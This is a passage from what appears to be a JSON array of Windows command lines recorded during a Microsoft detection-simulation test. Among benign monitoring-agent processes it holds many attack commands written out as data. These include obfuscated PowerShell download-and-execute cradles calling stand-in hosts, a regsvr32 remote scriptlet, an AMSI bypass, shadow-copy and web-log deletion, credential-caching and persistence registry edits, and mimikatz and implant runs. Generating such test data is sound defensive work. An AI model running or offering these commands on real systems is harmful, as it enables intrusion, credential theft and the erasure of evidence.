State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\".\\\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd  /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32  /C 42424.exe\",\"42424.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32  /C 1234.exe\",\"1234.exe\",\".\\\\rundll32  /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32  /C reg.exe\",\"reg.exe\",\".\\\\reg.exe  add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe  C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe  /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe  \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\ProgramData\\\"&copy \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin  delete shadows /all /quiet\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com\",\"net  user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator Bob_testing /add\",\"net  share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1  share TestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"net  use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\"net  use q: /delete\",\"net  share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1  share TestShare /delete\",\"net  user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1  user adm1nistrator /delete\",\".\\\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe   -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe  -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd   /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd  /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil  -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe  k111\",\"implant.exe  81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe  -b -t -m\",\"cmd  /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  Invoke-Shellcode.ps1\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell  -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net  localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1  localgroup Administrators\",\"whoami\",\"hostname\",\"netstat  -an\",\"net  user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user Bob1 /domain\",\"net  user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1  user BobX /domain\",\"net  group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1  group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32  /C ShEll32Control_RanDLL.dll\",\".\\\\reg  query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg  add Image File Execution Options sethc.exe\",\".\\\\ftp  -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg  add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f\",\".\\\\reg  add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f\",\"net  use v: \\\\\\\\tsclient\\\\c\",\"net  v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1  v: /delete\",\"cmd  /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh  advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg  add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe  /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe  -k malicious\",\"cmd.exe  /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe  -foo\",\".\\\\powershell.exe   -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"netsh  start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt\",\".\\\\wuauclt.exe  /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\".\\\\lsass.exe  /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"cmd  /c \\\"powershell wscript.shell used to download a .gif\\\"\",\"cacls.exe  c:\\\\windows\\\\system32\\\\wscript.exe /e /t /g everyone:f\",\"cmd  /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\2840.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe \",\"cmd  /c echo \\\" SYSTEMINFO && SYSTEMINFO && DEL \\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe   firewall set opmode mode=disable profile=all\",\"cmd  /c echo rundll32.exe perfc.dat\",\"c:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe   @ abc.com abc.wallet\",\"cmd  /c echo /e:vbscript.encode /b\",\"pcalua.exe  -a \\\\\\\\server\\\\payload.dll\",\"findstr  /si password sysvol *.txt\",\"odbcconf.exe  /S /A {REGSVR C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\{RANDOM}.txt\",\"odbcconf.exe  /f my.rsp\\u00e1\\u00e1\",\"sqldumper.exe  464 0 0x0110:40\",\"mt.exe  port\",\"mt.exe  smb\",\"hd.exe  -pslist\",\"hd.exe  -enum\",\"netsh.exe  PortOpenning\",\"certutil  -urlcache -split -f http://127.0.0.1/ \",\".\\\\reg  add \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\".\\\\reg  delete \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Svchost\\\\MyNastySvcHostConfig\\\"\",\"sc  create MSTICTestService binPath=C:\\\\Users\\\\MSTICA~1\\\\AppData\\\\Local\\\\Temp\\\\hd.exe DisplayName=\\\"Test Service\\\"\",\"sc  delete MSTICTestService\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"cmd  /c \\\"echo blahtest > \\\\\\\\.\\\\pipe\\\\blahtest\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\reg.exe   add \\\"hkcu\\\\console\\\" /v windowposition /t reg_dword /d 33554556 /f\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"c:\\\\windows\\\\fonts\\\\csrss.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\mimikatz.exe\",\".\\\\rundll32.exe  /C c:\\\\windows\\\\fonts\\\\conhost.exe\",\"c:\\\\windows\\\\fonts\\\\conhost.exe\",\".\\\\regsvr32  /u /s c:\\\\windows\\\\fonts\\\\csrss.exe\",\"tasklist\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 